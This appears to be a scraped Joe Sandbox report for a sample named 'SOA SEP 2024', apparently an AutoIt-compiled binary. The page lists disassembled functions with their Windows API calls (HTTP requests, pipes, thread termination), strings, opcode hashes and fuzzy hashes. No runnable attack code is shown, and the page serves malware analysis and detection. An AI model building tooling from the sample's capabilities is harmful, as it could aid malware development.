Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 7b33348291ab1bcc3599f6289a154352d14ca986c21dd9314553caf67a8f22c3
Instruction ID: b8ba555fa27dc75fe92e47f4bf6ff6271276c9a5fc6e6f7de37475dece574ed3
Opcode Fuzzy Hash: 7b33348291ab1bcc3599f6289a154352d14ca986c21dd9314553caf67a8f22c3
Instruction Fuzzy Hash: A1F03A72242198BBE7315B529C4EEEF7B7CEFCAB55F004018FA0199051E7A85E41C6B9

Function 007A9A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 007A9A33
EnterCriticalSection.KERNEL32(?,?,?,?,007D5DEE,?,?,?,?,?,0076ED63), ref: 007A9A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,007D5DEE,?,?,?,?,?,0076ED63), ref: 007A9A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,007D5DEE,?,?,?,?,?,0076ED63), ref: 007A9A5E

Part of subcall function 007A93D1: CloseHandle.KERNEL32(?,?,007A9A6B,?,?,?,007D5DEE,?,?,?,?,?,0076ED63), ref: 007A93DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 007A9A71
LeaveCriticalSection.KERNEL32(?,?,?,?,007D5DEE,?,?,?,?,?,0076ED63), ref: 007A9A78

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 2e981f3d57d656995bf7fd8a302870cd619e547d57e7a748441e4a803110df4c
Instruction ID: 086a945ea307c452fb23022876b2c7743c1733652c77c17c72a219f921e529fb
Opcode Fuzzy Hash: 2e981f3d57d656995bf7fd8a302870cd619e547d57e7a748441e4a803110df4c
Instruction Fuzzy Hash: 48F05E32142251EBD7211BA4ECCDDAA773DFF89301B148526F703990A0DB7D9C11DB55

Function 00761CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 0077F4EA: std::exception::exception.LIBCMT ref: 0077F51E
Part of subcall function 0077F4EA: __CxxThrowException@8.LIBCMT ref: 0077F533

__swprintf.LIBCMT ref: 00761EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00761D49

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 24901bcf2095ca40497a32bf4f9ce9bd9456f94dfcf44b690e91fc26d47213fc
Instruction ID: 4ace72b06b9f4eae896e2a5fe1bdc1316ef917b97471441c16679f6e3b6d24c5
Opcode Fuzzy Hash: 24901bcf2095ca40497a32bf4f9ce9bd9456f94dfcf44b690e91fc26d47213fc
Instruction Fuzzy Hash: 7F919B71104202DFCB25EF24C899C6AB7B8FF85700F44491EF886972A1DB39ED05CB92

Function 007BAFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007BB006
CharUpperBuffW.USER32(?,?), ref: 007BB115
VariantClear.OLEAUT32(?), ref: 007BB298

Part of subcall function 007A9DC5: VariantInit.OLEAUT32(00000000), ref: 007A9E05
Part of subcall function 007A9DC5: VariantCopy.OLEAUT32(?,?), ref: 007A9E0E
Part of subcall function 007A9DC5: VariantClear.OLEAUT32(?), ref: 007A9E1A

Strings

AUTOIT.ERROR, xrefs: 007BB11B
Incorrect Parameter format, xrefs: 007BB03E, 007BB20B

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 252099cdde61ac05be6d36a02ace24e7bd36f50f9bd9492a957d9dc489e16c91
Instruction ID: e1af7562f1095f2a4792e5761a54e57a71f2dbb3ee3dd65d75bb93b77e5ed5b6
Opcode Fuzzy Hash: 252099cdde61ac05be6d36a02ace24e7bd36f50f9bd9492a957d9dc489e16c91
Instruction Fuzzy Hash: AB914970608305DFCB10DF24C485AAABBE4BF89704F04886DF89A9B361DB79E945CB52

Function 007A5347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0077C6F4: _wcscpy.LIBCMT ref: 0077C717

_memset.LIBCMT ref: 007A5438
GetMenuItemInfoW.USER32(?), ref: 007A5467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007A5513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007A553D

Strings

0, xrefs: 007A5430

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: e4adb65ed7996e6e77c40fb67a9fea973f17d0b19b7e834305ad7e66c9bd949d
Instruction ID: 488067b38fa2f15d673d54bcc79a17be68b58ee54c8cf7a29e09bb0510c6d1af
Opcode Fuzzy Hash: e4adb65ed7996e6e77c40fb67a9fea973f17d0b19b7e834305ad7e66c9bd949d
Instruction Fuzzy Hash: BD514572A047419BDB109F28C8846ABB7EAEFCB324F14072DF896D3191D778CD448B52

Function 007A0213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007A027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007A02B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007A02C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007A0344

Strings

DllGetClassObject, xrefs: 007A02B7

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 6e75e84c02ec55a84283140712b4a89871b0429f9983f076ecb95d54a81e03a2
Instruction ID: 461a1543d1e614118f14f533f62c1d53113a5610f7888ed2ac4bcb7a5f210f6f
Opcode Fuzzy Hash: 6e75e84c02ec55a84283140712b4a89871b0429f9983f076ecb95d54a81e03a2
Instruction Fuzzy Hash: C9416CB1600204EFDF15CF54C884B9A7BB9EF8A311F1485ADA9099F206D7B9ED44CBE0

Function 007A5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A5075
GetMenuItemInfoW.USER32 ref: 007A5091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 007A50D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00821708,00000000), ref: 007A5120

Strings

0, xrefs: 007A506D

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: aa73ec22626f0c714b9fb3445e15bf4cbedc1404268c84b9bb22debdd30f54c8
Instruction ID: 9a0d4c736ffaa339f41b2bb131e11c85a8046673aa02781361db3eecb70aa319
Opcode Fuzzy Hash: aa73ec22626f0c714b9fb3445e15bf4cbedc1404268c84b9bb22debdd30f54c8
Instruction Fuzzy Hash: 2F41D071205701EFD720DF24D884B2AB7E4AFCA324F144B1EF85597292D738E900CB66

Function 007C0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 007C0587

Strings

stdcall, xrefs: 007C0609
cdecl, xrefs: 007C05DE
winapi, xrefs: 007C05F8
none, xrefs: 007C0662

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: bedb9925cecfc6c17a0c2dc077e54d62291e8b4c5a71b9f871ac47f3e785aa2f
Instruction ID: 79d14f18d291c8ceedbd0a2f26ef64d0d7ffd62be64261070d310efa531e5c8a
Opcode Fuzzy Hash: bedb9925cecfc6c17a0c2dc077e54d62291e8b4c5a71b9f871ac47f3e785aa2f
Instruction Fuzzy Hash: 3B31A170500216EFCF10EF64C845EEEB3B8FF55310B00866DE86AA76D1DB79A955CB90

Function 0079B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0079B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0079B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 0079B8D1

Strings

ListBox, xrefs: 0079B84D
ComboBox, xrefs: 0079B815

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 24426a806fac169e20b2408571c141b8e792065b897e40855669c0ef21b63f8b
Instruction ID: 6d6eabf16db7d98b8c887644ff8da91817255abc67d5d010d9a359ea8d58260a
Opcode Fuzzy Hash: 24426a806fac169e20b2408571c141b8e792065b897e40855669c0ef21b63f8b
Instruction Fuzzy Hash: 1221E1B2900108EFDF14ABA4E98ADFE777CDF09350B108129F466A71E0DB7C5D0697A0

Function 007651AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0076522F
_wcscpy.LIBCMT ref: 00765283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00765293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007D3CB0

Strings

Line: , xrefs: 007D3CD9

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 985c6cdb9163a1ec84b9459021104d285b2e958413f3e41e182c1ac3648266d5
Instruction ID: 569d855958d4119b9814798a99144d6dd0e5c55fc72c3abc7f54dd911760812f
Opcode Fuzzy Hash: 985c6cdb9163a1ec84b9459021104d285b2e958413f3e41e182c1ac3648266d5
Instruction Fuzzy Hash: 22310FB1108744EFC730EB60EC4AFDE77D8BF54300F10851AF98A92191EB78A648CB96

Function 007B43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007B4401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B4427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007B4457
InternetCloseHandle.WININET(00000000), ref: 007B449E

Part of subcall function 007B5052: GetLastError.KERNEL32(?,?,007B43CC,00000000,00000000,00000001), ref: 007B5067

Strings

, xrefs: 007B4450

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 92ba820554ead9df8525eaf7b15130716c1430d8a4f4be3b8609e69547f1cbd4
Instruction ID: 003aa5c329ceb962f026ce9ef1224ee18d33cb96803adb677a04ebf9fc2002e6
Opcode Fuzzy Hash: 92ba820554ead9df8525eaf7b15130716c1430d8a4f4be3b8609e69547f1cbd4
Instruction Fuzzy Hash: 79218EB2600248BEE721AF64CCC9FFBBBFCEB48748F10851AF10996141EA788D059771

Function 007C90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0077D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077D1BA
Part of subcall function 0077D17C: GetStockObject.GDI32(00000011), ref: 0077D1CE
Part of subcall function 0077D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007C915C
LoadLibraryW.KERNEL32(?), ref: 007C9163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007C9178
DestroyWindow.USER32(?), ref: 007C9180

Strings

SysAnimate32, xrefs: 007C9137

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 7f07bea154ad95a7f71d542fa64afd48c4ada1689210e39835ee4bee0cd99331
Instruction ID: 2f841bfcdbf087a29f943ec9d09993509fc2adeb3e118c941d2af3626f21afef
Opcode Fuzzy Hash: 7f07bea154ad95a7f71d542fa64afd48c4ada1689210e39835ee4bee0cd99331
Instruction Fuzzy Hash: B721BE7120020AFBEF604E648C8EFBA77ADEF99364F19421CFA1496190D739CC51A765

Function 007A9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 007A9588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007A95B9
GetStdHandle.KERNEL32(0000000C), ref: 007A95CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007A9605

Strings

nul, xrefs: 007A9600

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 3794868bc3f3ecbb430ad2aec5566ac3a4bf884a45b56973bd78817f122de3ad
Instruction ID: f99eda928239388186002e8f07f140e07a48ffed0c523d423eca1969daf021a7
Opcode Fuzzy Hash: 3794868bc3f3ecbb430ad2aec5566ac3a4bf884a45b56973bd78817f122de3ad
Instruction Fuzzy Hash: E9215170900205AFDB219F25DC46A9A77F8BF8A720F204B19FAA1DB2D0D778DD60CB10

Function 007A9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 007A9653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007A9683
GetStdHandle.KERNEL32(000000F6), ref: 007A9694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007A96CE

Strings

nul, xrefs: 007A96C9

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f95fed6ca419361159bda1bf1c9a43d48715e4e3e89b9633e792a0d9af16f3c8
Instruction ID: 6988cff176307b925e2e3f9a8eb2f9b9491055605d15fa801f1abca765fdfc03
Opcode Fuzzy Hash: f95fed6ca419361159bda1bf1c9a43d48715e4e3e89b9633e792a0d9af16f3c8
Instruction Fuzzy Hash: 622190715002059BDB249F699C44E9A77F8AF86720F204B18FBA1D72D0D7789861CB15

Function 007ADAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007ADB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007ADB5E
__swprintf.LIBCMT ref: 007ADB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,007FDC00), ref: 007ADBB5

Strings

%lu, xrefs: 007ADB71

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: b00eb99a493227841411a38bb6c8f721e2110632e644bd5811295d96e64f987b
Instruction ID: 0eac1cfe4d2607c5871d8518344e967ca91e411969115302daa6f58ebcf3e9be
Opcode Fuzzy Hash: b00eb99a493227841411a38bb6c8f721e2110632e644bd5811295d96e64f987b
Instruction Fuzzy Hash: 5A218675600148EFCB10EF55C985DAEB7B9EF89704B014069F909EB251DB74EE41CB61

Function 0079C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0079C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0079C84A
Part of subcall function 0079C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0079C85D
Part of subcall function 0079C82D: GetCurrentThreadId.KERNEL32 ref: 0079C864
Part of subcall function 0079C82D: AttachThreadInput.USER32(00000000), ref: 0079C86B

GetFocus.USER32 ref: 0079CA05

Part of subcall function 0079C876: GetParent.USER32(?), ref: 0079C884

GetClassNameW.USER32(?,?,00000100), ref: 0079CA4E
EnumChildWindows.USER32(?,0079CAC4), ref: 0079CA76
__swprintf.LIBCMT ref: 0079CA90

Strings

%s%d, xrefs: 0079CA8A

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: c3ae58cb39742fbda839c2fbaae9995cdee4ac660049dd55f683ed98245b3368
Instruction ID: 442d90062b05f50744f19120377e47770c8fb6f6de6dc27339da02846afef137
Opcode Fuzzy Hash: c3ae58cb39742fbda839c2fbaae9995cdee4ac660049dd55f683ed98245b3368
Instruction Fuzzy Hash: 4E1142B1500209ABDF12BFA09CC9FA9376DEF44754F008066FE19AA182DB789945DB70

Function 00787A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00787AD8

Part of subcall function 00787CF4: __mtinitlocknum.LIBCMT ref: 00787D06
Part of subcall function 00787CF4: EnterCriticalSection.KERNEL32(00000000,?,00787ADD,0000000D), ref: 00787D1F

InterlockedIncrement.KERNEL32(?), ref: 00787AE5
__lock.LIBCMT ref: 00787AF9
___addlocaleref.LIBCMT ref: 00787B17

Strings

`~, xrefs: 00787AA3

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

